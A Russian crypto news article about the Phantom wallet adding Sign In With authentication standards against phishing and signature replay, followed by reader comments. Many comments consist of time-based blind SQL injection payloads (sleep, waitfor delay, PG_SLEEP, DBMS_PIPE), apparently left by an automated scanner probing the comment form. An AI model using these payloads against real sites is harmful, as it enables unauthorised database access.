Кошелёк Phantom поддержал стандарты аутентификации для защиты от фишинга

Приложение криптокошелька Phantom добавило поддержку стандартов «Войти с помощью» (Sign In With или SIW) для повышения безопасности пользователей и защиты от фишинговых атак.

Криптокошелёк Phantom будет предоставлять пользователям необходимую информацию при взаимодействии с децентрализованными приложениями (dApps), которые соблюдают определённые стандарты безопасности для криптопользователей Solana и Ethereum, включая Sign In With X (CAIP-122) и Sign In With Ethereum (EIP-4361).

Эти стандарты помогают криптографическим учётным записям безопасно аутентифицироваться с помощью автономных сервисов путём подписания сообщения. Новая функция стала дополнением к набору услуг безопасности Phantom и остаётся на усмотрение команды dApps.

Если dApp реализует формат SIW, но имеет недопустимые поля, Phantom выдаст пользователям предупреждение. Для предотвращения атак с повторением подписи кошелёк будет отображать всплывающие поля, отражающие такую информацию, как доменное имя сайта и одноразовый номер.

Такие атаки происходят, когда злоумышленник перехватывает цифровую подпись, а затем использует её для получения несанкционированного доступа. Цифровые подписи используются для проверки подлинности транзакций и сообщений, но если злоумышленнику удастся их перехватить, он может обойти процесс аутентификации и получить доступ к конфиденциальным данным и украсть активы.



Звёзд: 1Звёзд: 2Звёзд: 3Звёзд: 4Звёзд: 5 (1 оценок, среднее: 5,00 из 5)
Загрузка...

Редактор. Переводчик. Криптоинвестор.

  1. Alexa

    10.02.2023

    Дарю тебе я этот кошелек, Пусть будет от него хороший толк. Чтоб денежки приятно в нем хрустели,
    И чтоб кармашки никогда не опустели. 🙂 Кошелек Фантом, деньги вроде есть и как бы их нет !!

  2. Irina

    11.02.2023

    Забавное название кошелька придумали. Главное, чтобы был надёжный.

  3. reda

    11.02.2023

    Мне понравилась эта новость, спасибо

  4. 555

  5. 5f2ESASr

    11.02.2023

    1

  6. if(now()=sysdate(),sleep(15),0)

    11.02.2023

    1

  7. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

    11.02.2023

    1

  8. -1); waitfor delay '0:0:15' --

    11.02.2023

    1

  9. 1 waitfor delay '0:0:15' --

    11.02.2023

    555

  10. -5 OR 501=(SELECT 501 FROM PG_SLEEP(15))--

    11.02.2023

    1

  11. -5) OR 734=(SELECT 734 FROM PG_SLEEP(15))--

    11.02.2023

    555

  12. -1)) OR 156=(SELECT 156 FROM PG_SLEEP(15))--

    11.02.2023

    1

  13. lepCvkyA' OR 314=(SELECT 314 FROM PG_SLEEP(15))--

    11.02.2023

    1

  14. YhlZTfcg') OR 401=(SELECT 401 FROM PG_SLEEP(15))--

    11.02.2023

    1

  15. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

    11.02.2023

    1

  16. yh1ZxZCR

  17. if(now()=sysdate(),sleep(15),0)

  18. (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

  19. -1); waitfor delay ‘0:0:15’ —

  20. Nqej9Gnf’; waitfor delay ‘0:0:15’ —

  21. -5) OR 432=(SELECT 432 FROM PG_SLEEP(15))–

  22. miXlG1tU

  23. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  24. -1; waitfor delay ‘0:0:15’ —

  25. 1 waitfor delay ‘0:0:15’ —

  26. -5) OR 24=(SELECT 24 FROM PG_SLEEP(15))–

  27. ndL9vSEm’) OR 21=(SELECT 21 FROM PG_SLEEP(15))–

  28. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  29. Дмитрий

    11.02.2023

    Главное чтобы этот кошелек был хорошо защищён,от взлома,а так надо попробовать его и потом я напишу более подробный отзыв.

  30. Петр

    11.02.2023

    Будем считать, что значительно уменьшится количество пoлучeния нecaнкциoниpoвaннoгo дocтупa к кошелькам.

  31. Сергей

    11.02.2023

    Phantom кoшeлёк надо будет завести проферить что к чему.